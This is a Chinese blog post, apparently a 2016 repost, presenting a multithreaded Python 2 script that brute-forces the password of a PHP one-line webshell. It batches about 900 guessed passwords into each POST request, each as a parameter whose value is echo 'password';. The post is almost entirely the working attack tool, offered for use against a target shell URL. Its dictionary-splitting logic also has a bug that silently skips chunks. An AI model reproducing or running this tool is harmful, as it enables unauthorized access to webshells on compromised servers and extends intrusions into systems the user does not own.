一句话爆破速度提升一千倍python脚本

时间：2016-12-29 13:28:50 阅读：221 评论：0 收藏：0 [点我收藏+]

标签：self argv echo owa max 没有 apache map main

这个脚本是接地提供的思路，一句话爆破速度提升一千倍，看了他的帖子然而没有看到工具，思路很牛逼，我提供一个Python脚本

本地测试了下，十万密码只需要3秒，速度还是可以的

# coding:utf-8
# __author__ : learn
 
import threading,Queue,requests
 
class Add_password:
 
    def __init__(self,dictname,queue):
        self.dictname = dictname
        self.queue = queue
 
    # 加载字典 以\n分割 保存到list
    def load_file(self):
        with open(self.dictname,‘r‘) as f:
            lines = f.readlines()
 
        return map(lambda x:x.split(‘\n‘)[0],lines)
 
    #========================
    ‘‘‘分割数量大于 900 密码数量的字典算法
    因为apache 最多传入1000个参数。 如果 密码数量大于900 就分割字典 
 
    ‘‘‘
    def split_file(self):
        file_read = self.load_file()
        file_list = []
        if len(file_read) < 900:
            file_list.append(file_read)
        elif len(file_read)%900 !=0 and len(file_read)/900 >= 1:
            split_num = len(file_read)
 
            for num in range(split_num/900-1):
                file_list.append(file_read[num*900:num*900+900])
            file_list.append(file_read[split_num/900*900:])
        return file_list
 
    # 主要的部分  用来生成payload 加入队列 
    # 待post参数的格式为 {"pass":"echo ‘pass‘;","pass2":"echo ‘pass2‘;",...}
    def main(self):
        php_passwords = self.split_file()
        for q in php_passwords:
            payloads = [x for x in q]
            payload = map(lambda x:{x:"echo ‘%s‘;"%x},payloads)
            payload = reduce(lambda x,y:dict(x,**y),payload)
            self.queue.put(payload)
        return
 
     
class Main(threading.Thread):
 
    def __init__(self,url,queue):
        threading.Thread.__init__(self)
        self.url = url
        self.queue = queue
        self.payloads = {}
 
         
    def run(self):
        while True:
            if self.queue.empty():
                break
            data = self.queue.get_nowait()
            req = requests.post(self.url,data=data)
 
            #这里我判断的是 post之后的页面有没有echo的值 导致脚本局限性很大。
            if req.content != ‘‘:
                print ‘Password Found: ‘+req.content
                exit(0)
 
 
if __name__ == ‘__main__‘:
    import sys
 
    threads = []
    q = Queue.Queue(maxsize=0)
 
    args = sys.argv
    if len(args)<3 or args[1][:4]!=‘http‘ or args[2][-3:] != ‘txt‘:
        print ‘usage: python %s [url]http://www.xxx.com/shell[/url],php password.txt‘%args[0]
        sys.exit(0)
 
    Add_password(args[2],q).main()
    for i in range(15):#这里可以适当的修改，速度会提高
        threads.append(Main(args[1],q))
 
    for t in threads:
        t.start()
 
    for j in threads:
        j.join()

标签：self argv echo owa max 没有 apache map main

原文地址：http://www.cnblogs.com/test404/p/6232368.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行